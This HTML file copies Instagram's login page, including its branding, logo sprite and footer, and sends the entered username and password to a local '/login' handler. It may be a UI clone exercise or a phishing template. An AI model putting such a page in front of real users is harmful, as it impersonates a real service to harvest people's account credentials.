<!doctype html>

<html lang="en">
<head>
	<style>
body {
    font-family: sans-serif;
    background-color: #fafafa;
    font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen,
      Ubuntu, Cantarell, "Open Sans", "Helvetica Neue", sans-serif;
    box-sizing: border-box;
  }
  
  a {
    text-decoration: none;
  }
  
  .container {
    max-width: 1000px;
    margin: 0 auto;
    display: flex;
    justify-content: center;
    flex-direction: column;
    align-items: center;
    margin-top: 3rem;
    font-size: 14px;
  }
  
  .box {
    max-width: 350px;
    width: 100%;
    display: flex;
    justify-content: center;
    align-items: center;
    flex-direction: column;
    background-color: #ffff;
    border: 1px solid #e6e6e6;
    border-radius: 1px;
    margin: 0 0 10px;
    padding: 10px 0;
    flex-grow: 1;
  }
  
  .heading {
    margin: 22px auto 12px;
    background-image: url("https://www.instagram.com/static/bundles/es6/sprite_core_b20f2a3cd7e4.png/b20f2a3cd7e4.png");
    background-position: -98px 0;
    height: 51px;
    width: 177px;
    overflow: hidden;
  }
  
  .field {
    margin: 10px 0;
    position: relative;
    font-size: 14px;
    width: 100%;
    text-overflow: ellipsis;
  }
  
  input {
    padding: 9px 0px 7px 9px;
    font-size: 12px;
    width: 16rem;
    height: 1.2rem;
    outline: none;
    background: #fafafa;
    border-radius: 3px;
    border: 1px solid #efefef;
  }
  
  /* label intial position*/
  
  label {
    position: absolute;
    pointer-events: none;
    left: 10px;
    padding-bottom: 15px;
    transform: translateY(10px);
    line-height: 6px;
    transition: all ease-out 0.1s;
    font-size: 14px;
    color: #999;
    padding-top: 6px;
  }
  
  /* hiding placeholder in all browsers */
  
  input::placeholder {
    visibility: hidden;
  }
  
  /* hiding  placeholder in mozilla */
  .login-form ::-moz-placeholder {
    color: transparent;
  }
  
  /* label final position */
  input:not(:placeholder-shown) + label {
    transform: translateY(0);
    font-size: 11px;
  }
  
  /* input padding increases if placeholder is not shown */
  input:not(:placeholder-shown) {
    padding-top: 14px;
    padding-bottom: 2px;
  }
  
  .login-button {
    text-align: center;
    width: 100%;
    padding: 0.5rem;
    border: 1px solid transparent;
    background-color: #3897f0;
    color: #fff;
    font-weight: 600;
    font-size: 14px;
    cursor: pointer;
  }
  
  .separator {
    display: flex;
    justify-content: space-between;
    align-items: center;
    color: #999;
    margin-top: 6px;
  }
  
  .separator .line {
    height: 1px;
    width: 40%;
    background-color: #dbdbdb;
  }
  
  .other {
    display: flex;
    justify-content: center;
    flex-direction: column;
    align-items: center;
  }
  
  .fb-login-btn {
    margin: 1rem;
    border: 0;
    cursor: pointer;
    font-size: 14px;
    color: #385185;
    font-weight: 600;
    background: transparent;
  }
  
  .fb-icon {
    color: #385185;
    font-size: 1rem;
    padding-right: 1px;
  }
  
  .forgot-password {
    font-size: 11px;
    color: #003569;
  }
  
  .signup {
    color: #3897f0;
    font-weight: 600;
  }

  .apps{
    text-align: center;
    color: #262626;
  }
  
  .apps p{
    margin-bottom: 20px;
  }
  
  .apps a img{
    width: 135px;
    height: 40px;
    margin: 0 5px;
  }
  
  .footer{
    max-width: 935px;
    width: 100%;
    margin: 0 auto;
    padding: 40px 0;
    display: flex;
    justify-content: space-between;
  }
  
  .footer .links ul li{
    display: inline-block;
    margin-right: 10px;
  }
  
  .footer .links ul li a{
    color: #003569;
    font-size: 12px;
  }
  
  .footer .copyright{
    color: #999;	
  }		
	</style>
  <meta charset="utf-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <link href="instagram.css" rel="stylesheet">
  <title>Login • Instagram</title>
</head>

<body>
    <div class="container">
        <div class="box">
            <div class="heading"></div>
            <form action="/login" method="POST">
                <div class="field">
                    <input name="username" type="name" placeholder="Phone number, username, or email" required/>
                    <label for="username">Phone number, username, or email</label>
                </div>
                <div class="field">
                    <input name="password" type="password" placeholder="password" required/>
                    <label for="password">Password</label>
                </div>
                 <button class="login-button" title="login" name="submit">Log In</button>
                <div class="separator">
                    <div class="line"></div>
                    <p>OR</p>
                    <div class="line"></div>
                </div>
                <div class="other">
                    <button class="fb-login-btn" type="button">
                        <i class="fa fa-facebook-official fb-icon"></i>
                        <span class="">Log in with Facebook</span>
                    </button>
                    <a class="forgot-password" href="#">Forgot password?</a>
                </div>
            </form>
        </div>
        <div class="box">
            <p>Don't have an account? <a class="signup" href="#">Sign Up</a></p>
        </div>
        <div class="apps">
			<p>Get the app.</p>
			<div class="icons">
				<a href="#"><img src="appstore.png" alt="appstore"></a>
				<a href="#"><img src="googleplay.png" alt="googleplay"></a>
			</div>
		</div>
        <div class="footer">
            <div class="links">
                <ul>
                    <li><a href="#">ABOUT US</a></li>
                    <li><a href="#">SUPPORT</a></li>
                    <li><a href="#">PRESS</a></li>
                    <li><a href="#">API</a></li>
                    <li><a href="#">JOBS</a></li>
                    <li><a href="#">PRIVACY</a></li>
                    <li><a href="#">TERMS</a></li>
                    <li><a href="#">DIRECTORY</a></li>
                    <li><a href="#">PROFILES</a></li>
                    <li><a href="#">HASHTAGS</a></li>
                    <li><a href="#">LANGUAGE</a></li>
                </ul>
            </div>
            <div class="copyright">
                <br>
        
                © 2021 INSTAGRAM
            </div>
        </div>
</body>
</html>
